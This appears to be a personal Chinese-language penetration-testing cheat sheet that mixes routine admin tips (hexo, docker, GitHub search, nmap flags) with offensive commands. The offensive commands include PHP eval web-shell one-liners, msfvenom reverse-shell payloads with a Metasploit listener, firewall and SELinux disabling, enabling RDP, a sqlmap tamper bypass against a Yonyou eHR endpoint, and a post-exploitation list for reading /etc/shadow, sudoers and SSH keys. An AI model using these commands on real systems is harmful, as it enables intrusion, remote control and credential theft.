推送到github
hexo g # generate生成 hexo d # deploy 推送
|
windows
netsh firewall set opmode mode=disable
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
win tasklist /svc /if查找到文件名然后搜索位置,
dir C:\ /s /b | find "example.txt"
echo ^<? php @eval($_POST['123']); ?^> > shell.php
echo ^<? php @eval($_POST['123']);?^> >> shell.php
注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings 新建一个DWORD(32位)值命名为FlightSettingsMaxPauseDays 双击新建的FlightSettingsMaxPauseDays基数改为10进制,左侧数值数据写上你想暂停更新的天数,点击确定 在windows更新中选择暂停时间,可选择刚才设置的时间
|
msf
https://blog.csdn.net/qq_15131581/article/details/127452844
#生成payload msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=2333 -f py 生成elf木马 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=X.X.X.X LPORT=8888 -f elf > mshell.elf
#监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 8888 run #上传 upload //root//fscan_386
|
proxychains安装
apt-get install proxychains vim /etc/proxychains.conf 添加socks5 127.0.0.1 1080
|
sqlmap 用友ehr绕过
sqlmap -u "http://x.x.x.x/servlet/codesettree?categories=1&codesetid=1&flag=c&parentid=-1&status=1" -p categories --dbms="Microsoft SQL Server" --tamper ehr_SafeCodeEncode_tamper --level 3
|
docker
#进入容器内部 docker exec -it <id> /bin/bash #查看docker状态 docker container ls
#检测是否在docker中 # 是否存在此文件 ls -al /.dockerenv
# 在其中是否包含docker字符串 cat /proc/1/cgroup
|
gtihub搜索语法:
in:name baidu #标题搜索含有关键字baidu in:descripton baidu #仓库描述搜索含有关键字 in:readme baidu #Readme文件搜素含有关键字 stars:>3000 baidu #stars数量大于3000的搜索关键字 stars:1000..3000 baidu #stars数量大于1000小于3000的搜索关键字 forks:>1000 baidu #forks数量大于1000的搜索关键字 forks:1000..3000 baidu #forks数量大于1000小于3000的搜索关键字 size:>=5000 baidu #指定仓库大于5000k(5M)的搜索关键字 pushed:>2019-02-12 baidu #发布时间大于2019-02-12的搜索关键字 created:>2019-02-12 baidu #创建时间大于2019-02-12的搜索关键字 user:name #用户名搜素 license:apache-2.0 baidu #明确仓库的 LICENSE 搜索关键字 language:java baidu #在java语言的代码中搜索关键字 user:baidu in:name baidu #组合搜索,用户名baidu的标题含有baidu的
|
webrtc
#火狐浏览器 about:config,将media.peerconnection.enabled值改为false;
|
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>WebRTC泄露检测</title> </head> <body> <script> function findIP(onNewIP) { var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}), noop = function() {}, localIPs = {}, ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, key;
function ipIterate(ip) { if (!localIPs[ip]) onNewIP(ip); localIPs[ip] = true; }
pc.createDataChannel("");
pc.createOffer(function(sdp) { sdp.sdp.split('\n').forEach(function(line) { if (line.indexOf('candidate') < 0) return; line.match(ipRegex).forEach(ipIterate); }); pc.setLocalDescription(sdp, noop, noop); }, noop);
pc.onicecandidate = function(ice) { if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return; ice.candidate.candidate.match(ipRegex).forEach(ipIterate); }; }
function show(ip) { alert(ip); }
findIP(show);
</script> </body> </html>
|
linux
less
less和more类似,但是使用less可以随意浏览文件,而more仅能向前移动,却不能向后移动,more启动时会加载整个文件。而且less在查看之前不会加载整个文件
awk
用来处理文本,将文本按照指定的格式输出。其中包含了变量,循环以及数组
[root@localhost ~]#awk -F: '{print $1}' /etc/passwd root bin daemon adm ...
|
docker
进去容器中
docker exec -it /bin/bash
关闭所有容器
docker stop $(docker ps -a -q)
|
nmap
-sn 基础主机发现
-sc 默认脚本
–script=vuln 脚本扫描 脚本路径在/usr/share/nmap/scripts
– ssl-enum-ciphers ssl版本漏洞
-pn /-p0 无ping扫描
命令
echo '<?php @eval($_POST["123"]); ?>' > 1.php
echo '<?php @eval($_POST["123"]); ?>' >> 1.php
find /root -name "1.txt"
lsof -i :8080
linux查找文件进程后可以用tree进程树查找最后定位到文件。win 定位后管理器查看进程文件位置。 Linux lsof直接就可以看
chcp 65001
su -l admin
useradd name passwd name
vim /etc/sysconfig/network-scripts/ifcfg-eno systemctl restart network
systemctl stop firewalld setenforce 0
iptables -F 获取内核,操作系统和设备信息 版本信息 uname -a 所有版本 uname -r 内核版本信息 uname -n 系统主机名字 uname -m Linux内核架构 内核信息 cat /proc/version CPU信息 cat /proc/cpuinfo 发布信息 cat /etc/*-release cat /etc/issue 主机名 hostname 文件系统 df -a 内核日志 dmesg / /var/log/dmesg 6.2.1.2. 用户和组 列出系统所有用户 cat /etc/passwd 列出系统所有组 cat /etc/group 列出所有用户hash(root)``cat /etc/shadow`` 用户 查询用户的基本信息 finger 当前登录的用户 users who -a /var/log/utmp 查询无密码用户 grep 'x:0:' /etc/passwd 目前登录的用户 w 登入过的用户信息 last / /var/log/wtmp 显示系统中所有用户最近一次登录信息 lastlog / /var/log/lastlog 登录成功日志 /var/log/secure 登录失败日志 /var/log/faillog 查看特权用户 grep :0 /etc/passwd 查看passwd最后修改时间 ls -l /etc/passwd 查看是否存在空口令用户 awk -F: 'length($2)==0 {print $1}' /etc/shadow 查看远程登录的账号 awk '/\$1|\$6/{print $1}' /etc/shadow 查看具有sudo权限的用户 cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)" 6.2.1.3. 用户和权限信息 当前用户 whoami 当前用户信息 id 可以使用sudo提升到root的用户(root) cat /etc/sudoers 列出目前用户可执行与无法执行的指令 sudo -l 6.2.1.4. 环境信息 打印系统环境信息 env 打印系统环境信息 set 环境变量中的路径信息 echo $PATH 打印历史命令 history / ~/.bash_history 显示当前路径 pwd 显示默认系统遍历 cat /etc/profile 显示可用的shell cat /etc/shells 6.2.1.5. 进程信息 查看进程信息 ps aux 资源占有情况 top -c 查看进程关联文件 lsof -c $PID 完整命令行信息 /proc/$PID/cmdline 进程的命令名 /proc/$PID/comm 进程当前工作目录的符号链接 /proc/$PID/cwd 运行程序的符号链接 /proc/$PID/exe 进程的环境变量 /proc/$PID/environ 进程打开文件的情况 /proc/$PID/fd 6.2.1.6. 服务信息 由inetd管理的服务列表 cat /etc/inetd.conf 由xinetd管理的服务列表 cat /etc/xinetd.conf nfs服务器的配置 cat /etc/exports 邮件信息 /var/log/mailog ssh配置 sshd_config 6.2.1.7. 计划任务 显示指定用户的计划作业(root) crontab -l -u %user% 计划任务 /var/spool/cron/* /var/spool/anacron/* /etc/crontab /etc/anacrontab /etc/cron.* /etc/anacrontab 开机启动项 /etc/rc.d/init.d/ 6.2.1.8. 网络、路由和通信 列出网络接口信息 /sbin/ifconfig -a / ip addr show 列出网络接口信息 cat /etc/network/interfaces 查看系统arp表 arp -a 打印路由信息 route / ip ro show 查看dns配置信息 cat /etc/resolv.conf 打印本地端口开放信息 netstat -an 列出iptable的配置规则 iptables -L 查看端口服务映射 cat /etc/services Hostname hostname -f 查看进程端口情况 netstat -anltp | grep $PID 6.2.1.9. 已安装程序 rpm -qa --last Redhat yum list | grep installed CentOS ls -l /etc/yum.repos.d/ dpkg -l Debian cat /etc/apt/sources.list Debian APT pkg_info xBSD pkginfo Solaris pacman -Q Arch Linux emerge Gentoo 6.2.1.10. 文件 最近五天的文件 find / -ctime +1 -ctime -5 文件系统细节 debugfs 6.2.1.11. 公私钥信息 ~/.ssh /etc/ssh 6.2.1.12. 日志 /var/log/boot.log /var/log/cron /var/log/faillog /var/log/lastlog /var/log/messages /var/log/secure /var/log/syslog /var/log/syslog /var/log/wtmp /var/log/wtmp /var/run/utmp 6.2.1.13. 虚拟环境检测 lsmod | grep -i "vboxsf\|vboxguest" lsmod | grep -i "vmw_baloon\|vmxnet" lsmod | grep -i "xen-vbd\|xen-vnif" lsmod | grep -i "virtio_pci\|virtio_net" lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" 6.2.1.14. 容器内信息收集 capsh --print cat /proc/1/cgroup env | grep KUBE ls -l .dockerenv ls -l /run/secrets/Kubernetes.io/ mount ps aux
|